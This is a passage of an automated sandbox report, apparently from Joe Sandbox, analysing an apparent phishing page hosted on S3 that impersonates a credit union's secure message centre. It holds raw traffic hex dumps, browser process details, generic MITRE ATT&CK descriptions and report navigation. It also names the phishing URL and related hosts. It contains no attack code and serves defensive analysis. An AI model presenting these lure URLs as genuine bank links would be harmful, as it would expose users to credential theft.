2025-01-02 16:21:54 UTC	1369	IN	Data Raw: 42 02 47 39 7c 78 22 24 0c 1b c2 85 38 5c 7a 16 0b e8 c5 58 3e 6b 23 77 df dd bf 68 e1 a2 85 23 87 0d 1b f6 cb e4 4a d6 02 72 4d 29 ce a7 31 6b 1f 0c fa 50 28 29 06 fc 3a cb 6f 62 7c 65 33 ee ca fb c6 fd 38 9e 5a fe 14 ba bd d4 0d 25 fb 4b 84 d5 97 22 08 41 80 5f 6a 99 2c 74 5b 7f ee 93 22 43 0d 3a 57 3a e7 a7 97 3f 0d 65 59 a9 2c da ba ae c0 b4 e7 51 8d 3d 02 4d a8 24 c6 ab 82 4a cd 1f a8 aa aa 44 3c 91 40 8b 16 2d f2 07 0e 7c e0 b6 59 ef cf 1a d5 af 5f bf ae 92 d0 85 e6 ff 7b cb 5a 83 13 61 29 f2 f1 7a 01 be 45 c2 8e 65 b9 0c 7e 96 02 8b c5 28 18 f9 db ff ec b1 6c c5 d2 31 c3 7e 3d ec 8e d6 ad 5a b5 50 41 82 16 b3 e8 89 3c 48 01 5f 83 9e ea c6 42 79 ae 1d 3a 3d f5 f5 31 7e b6 90 dc 89 fd 95 fb f0 b3 d7 6f c0 23 ef 3f 82 ea 78 b5 06 97 85 00 04 40 4d dd Data Ascii: BG9\|x"$8\zX>k#wh#JrM)1kP():ob\|e38Z%K"A_j,t["C:W:?eY,Q=M$JD<@-\|Y_{Za)zEe~(l1~=ZPA<H_By:=1~o#?x@M
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: d0 76 69 dd ba 75 b3 e4 8e bb 3d 3a 74 b8 f8 d2 68 34 1a 31 f3 cb 7d 6d e5 19 ec 1c d7 b3 e5 07 38 c9 87 a3 06 be dc f8 82 89 c0 c7 a2 8f 17 62 f4 dc c7 b0 e9 b3 4d 80 ef b0 f8 9e 04 be 93 00 b8 2d 09 80 eb 2c b2 28 41 02 02 b8 6c dd 6d 80 3f b6 91 02 92 f6 2d cf c7 b0 2b 7f 8d 2b db 14 11 20 c5 28 00 c0 24 a0 48 a5 d5 19 f0 ec 29 f0 68 41 02 09 52 49 cd 1e 00 69 5d e7 91 04 93 53 a0 85 5c b1 e2 2d c5 5b 5e 7a f1 4f 53 3f fd f4 d3 03 04 72 87 c4 a5 16 75 49 06 6e 12 38 41 08 40 00 df 05 70 37 f8 6f b9 e5 e6 f6 dd 7b dc d0 ad 5d bb 76 6d 23 91 48 f8 30 88 19 f0 62 59 ae c7 99 7d 7d 1c 67 8f 39 43 0f ad dd c0 37 af b3 07 f0 8f bd ff 00 01 7f 79 e9 72 91 8c 93 20 15 00 b6 01 df dd cf 62 4f 02 b2 56 70 e7 01 12 36 cd 62 27 07 59 17 c3 8b 2a 5d 3a b6 e9 88 61 Data Ascii: viu=:th41}m8bM-,(Alm?-++ ($H)hARIi]S\-[^zOS?ruIn8A@p7o{]vm#H0bY}}g9C7yr bOVp6b'Y*]:a
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: 26 4d 52 59 fc c3 e0 26 b0 eb 65 b8 2c 62 e3 4d 31 5e af 81 cd 60 67 6b 01 91 39 56 a6 1b 1c 5b d2 f2 d6 09 ab 26 a0 db b3 57 e3 be c9 f7 e3 83 5d ff 00 83 c2 12 e3 b3 b8 40 42 5a f6 b9 dd 7c 09 0e 88 be 10 69 5b 18 e2 02 9c e5 18 c8 d7 dd de 88 dc 59 d8 4d 82 0e 12 10 90 d9 bc 77 33 1e 9a fd 30 6e fe f3 2d 78 7b e3 db a8 ae ad e1 59 7f 62 81 91 06 3e d7 8d 06 e4 04 22 03 7d b9 31 7b ea 87 85 93 c0 fa 98 a6 05 05 f4 6c 03 ec d9 bb 17 32 89 6d 21 00 4b 69 d8 04 e0 b3 b6 3f 5b 7f fd fa 75 b1 45 4b 17 a2 e2 50 39 9a 37 6f 81 68 5e 63 1d 02 f8 64 f9 19 fc 32 e6 07 d2 ac bd 20 6a b1 8d 35 ff 96 bb 54 50 62 8f 16 e9 14 fd f1 4a 3c 3a 6b 34 3e f9 e2 13 06 81 00 82 1b 14 52 6c 93 9d 5d ae be 23 b6 97 5f 2b 4f 08 f7 89 22 2d ad 3c f6 c8 e7 c0 6d 47 58 13 ce fc 9e Data Ascii: &MRY&e,bM1^`gk9V[&W]@BZ\|i[YMw30n-x{Yb>"}1{l2m!Ki?[uEKP97oh^cd2 j5TPbJ<:k4>Rl]#_+O"-<mGX
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: c6 a1 00 25 59 d6 41 04 b4 45 f4 67 bb 3f 45 c7 df 74 c2 ed cf dd 89 19 6b 67 a2 bc aa 1c b6 52 17 f8 4e f0 db 2d 93 04 b2 04 3f 1f eb fe 3c 70 dd 7e 9e 2e 12 70 59 7a 1b 41 64 2a f2 7c c5 b5 5a af 53 de 1b 1b 79 3a 44 dc 67 d6 f6 24 a6 2c 15 35 15 58 b0 75 01 06 4f 1a 82 eb 7f 7f 43 12 fc 1b 51 5e 5e c6 07 28 f6 46 19 e8 dc a7 db 66 57 a2 38 00 d4 e7 2d c1 ea 09 01 d8 6f 50 3c 91 88 b3 1b cf 4b 3c 8f b6 1c aa 3a 74 04 97 d7 61 f5 33 fe f2 c9 d0 40 f6 71 bf 95 20 64 1d b2 2e 01 76 8c e0 85 8b 20 1c f1 b4 cb 0b 81 e8 b7 02 52 f4 e1 d8 48 80 c5 71 8f e1 58 18 05 e8 47 9f 73 08 c9 85 01 4f da 54 cc 3f 53 0c 01 d4 67 12 a8 0f 04 10 d8 c8 80 a4 26 19 6c 71 d6 1e a2 b8 bd 81 48 28 62 b7 7c 9e 4b 32 00 bd ef 20 0f 61 d5 ed 84 63 01 15 2c 7f 8f 4c c1 9f f9 7d 70 Data Ascii: %YAEg?EtkgRN-?<p~.pYzAd*\|ZSy:Dg$,5XuOCQ^^(FfW8-oP<K<:ta3@q d.v RHqXGsOT?Sg&lqH(b\|K2 ac,L}p
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: af 0f 20 86 01 b0 ec de 98 39 35 45 20 f7 4c 71 56 11 01 1f 82 5f 27 9e 45 40 ae a9 64 5d 04 e4 49 1e c8 99 80 81 10 03 80 ed 8b 6a 69 69 51 d5 80 7c 32 0b ac 54 91 5b 86 cc 60 a6 e1 86 db 80 69 35 a3 39 d9 bb e8 d0 87 32 5d 1f 80 24 b2 3d 36 fd 6e 5f 66 35 ef d4 a3 60 5f 54 ad 64 fe 63 42 fe 04 ac bd 72 2d c6 e7 8f 07 a7 53 c6 9e 82 37 ae 7e 03 79 c1 3c 56 1c c4 5c 02 b3 d0 35 91 3d 5e 01 22 b9 67 0a d2 0b d8 2f 4b ba e7 68 aa b0 1e 2b 07 5d 04 64 df db c3 31 06 40 64 f8 32 f8 31 12 b5 07 0e 36 43 1b 58 7a 65 2e 80 89 46 e5 57 ca 9b 69 b1 00 6c c0 b3 a4 d2 6c e6 76 c0 0e 66 f3 58 71 cb 0a fb 70 4f 7b a4 dc f6 7e 7f 9a 9f 00 af af e9 8e 8e cd 1f 8b 75 57 ae c3 a4 c2 49 30 d1 99 e3 cf c4 6b 8b 5e 43 4e 7a 4e a2 2b a1 af 05 17 a6 fe ee 9f 5d 30 28 01 10 cc Data Ascii: 95E LqV_'E@d]IjiiQ\|2T[`i592]$=6n_f5`_TdcBr-S7~y<V\5=^"g/Kh+]d1@d216CXze.FWillvfXqpO{~uWI0k^CNzN+]0(
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: 89 97 2e 7e 09 e7 4f 3c 1f fd 45 bf 58 f9 0b dc fb f7 7b 0d bd 19 46 8b c7 37 55 e4 54 b0 e8 1f 4f ff b1 ba 54 1a 02 82 8e f6 0e 5b 06 c0 93 3c 32 13 10 f6 38 00 ef 21 db b7 af ba 11 80 96 b8 d4 7c 41 81 40 a3 1d 3e ba 70 34 b2 32 b2 2c 9a df 97 60 b0 17 05 b9 f2 9a 01 28 aa 38 42 6c 16 02 7e d8 47 8e 1f 3e dc 05 4f 32 99 fc c4 f4 d9 33 44 06 9e bb f0 39 5c 3c e9 62 f4 17 fd 7a cd af 71 cf 86 7b 40 9f d1 50 ed 68 33 f7 05 5b 19 c9 3d 52 94 5e f4 79 6f 4b d8 73 1e 3b 52 bc be be a1 9e ef dd 81 ea ff 0f d4 91 60 26 21 e0 ee dc b1 b3 c9 f5 3c 8f ba 02 e3 c3 17 52 29 09 1e 5b 30 06 f9 d9 f9 0c 0c 16 60 5b 05 83 4d f3 13 e8 a9 40 86 b9 02 92 7b 59 fd bc 48 65 74 79 9f 0e f5 e4 64 06 90 07 32 f7 c3 4a f3 87 e9 6f 4a 17 e9 78 fa 82 a7 71 d9 94 cb d0 5f f4 bb 77 Data Ascii: .~O<EX{F7UTOT[<28!\|A@>p42,`(8Bl~G>O23D9\<bzq{@Ph3[=R^yoKs;R`&!<R)[0`[M@{YHetyd2JoJxq_w
2025-01-02 16:21:54 UTC	1369	IN	Data Raw: 17 bd 5a f5 2a 16 bf b4 18 8e 70 12 c1 af cd ff 34 5a 53 aa d3 80 ff d7 e4 9e 28 4e 67 e6 7f d2 d9 ff a0 6e 54 f5 9c bc d8 b9 73 57 55 b2 7d 3b d0 85 c1 40 b7 00 92 09 83 68 fd a1 fa 8e ae ee ee 2e 21 41 6f 88 03 98 03 81 e3 50 5e 58 4e 60 30 93 3d 46 e0 71 ed 4f cf 49 d3 7e c5 8d 2b 30 77 f4 5c 5f 1a 68 ed b5 6b 71 4c e1 31 2a 35 a8 dd 00 e6 8b f7 32 4b 80 af 69 be c1 2f 99 cc fe 30 15 27 dd f5 b5 bb f0 db d3 7f 8b fe a2 65 7b 97 61 d1 4b 8b 10 15 51 32 f1 33 f4 4a da df 32 73 d1 37 f8 f9 77 23 5d c3 02 51 c0 80 9f 00 7e 7a cc 02 d0 9e f0 c2 0d f5 0d 6d 00 5c 2b f8 fd d1 b0 12 00 16 e0 27 b0 d7 74 f8 48 bd 80 f6 c5 78 1c c0 4c d3 4b a6 61 54 e1 28 d8 fb fd f9 f3 86 d9 c5 49 c0 2f 5d 8d 37 6f 78 13 27 8f 3b 19 7e 69 4c fe 18 ac 5b bc 0e 93 0b 27 93 45 11 Data Ascii: Zp4ZS(NgnTsWU};@h.!AoP^XN`0=FqOI~+0w\_hkqL152Ki/0'e{aKQ23J2s7w#]Q~zm\+'tHxLKaT(I/]7ox';~iL['E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49761	67.227.180.41	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:54 UTC	615	OUT	GET /favicon.ico HTTP/1.1 Host: www.midoregon.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:54 UTC	492	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 16:21:54 GMT Server: Apache Last-Modified: Thu, 24 Sep 2020 17:23:28 GMT Accept-Ranges: bytes Content-Length: 15086 Cache-Control: max-age=2592000, public Expires: Sat, 01 Feb 2025 16:21:54 GMT Vary: Accept-Encoding,User-Agent Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-FRAME-OPTIONS: SAMEORIGIN Connection: close Content-Type: image/x-icon
2025-01-02 16:21:54 UTC	7700	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 81 62 09 b5 81 62 46 b5 81 62 a0 b5 81 62 e0 b5 81 62 fd b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 ff b5 81 62 fe b5 81 62 e5 b5 Data Ascii: 00 %6 % h6(0` $bbFbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
2025-01-02 16:21:54 UTC	7386	IN	Data Raw: 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 80 5c ff b5 81 62 ff b5 81 62 df b5 81 62 81 b5 81 62 fe b5 80 5c ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 7f 57 ff b5 Data Ascii: WWWWWWWWWWWWWWWW\bbbb\WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	13.32.27.129	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:54 UTC	614	OUT	GET /aryxwmw.io HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:55 UTC	491	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 Content-Length: 1 Connection: close Date: Thu, 02 Jan 2025 16:21:54 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Error from cloudfront Via: 1.1 27f780feafa4114cfc67d86fca85d124.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-C2 X-Amz-Cf-Id: jVfTMQhvdZKOxJgVd4v3GG2pW3rgtblTw4Z2DovY8NfjdUTo7EyqxA==
2025-01-02 16:21:55 UTC	1	IN	Data Raw: 0a Data Ascii:

Target ID:	0
Start time:	11:21:25
Start date:	02/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:21:27
Start date:	02/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1956,i,5072005489265029197,6163600795144254209,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	11:21:34
Start date:	02/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5924, Parent PID: 600

Windows Analysis Report
https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html